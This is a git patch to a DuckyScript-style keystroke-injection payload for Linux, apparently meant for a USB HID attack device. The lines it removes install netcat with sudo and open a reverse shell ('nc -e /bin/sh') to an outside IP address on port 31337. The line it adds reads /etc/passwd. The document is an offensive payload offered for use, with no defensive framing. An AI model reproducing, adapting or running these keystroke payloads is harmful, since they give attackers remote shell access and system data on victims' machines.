From f4600401d5f4e403ebac579558c20367c54d87bc Mon Sep 17 00:00:00 2001 From: Denis Zheleztsov Date: Thu, 22 Aug 2024 11:16:45 +0300 Subject: [PATCH] Up --- linux.txt | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/linux.txt b/linux.txt index bbc983f..f409a7b 100644 --- a/linux.txt +++ b/linux.txt @@ -2,8 +2,4 @@ DELAY 1500 GUI r DELAY 500 -STRING [[ which apt ]] && sudo apt install -y netcat-openbsd -DELAY 100 -STRING [[ which yum ]] && sudo yum install -y netcat -DELAY -STRING nc -e /bin/sh 45.92.178.34 31337 +STRING /usr/bin/bash -c 'cat /etc/passwd'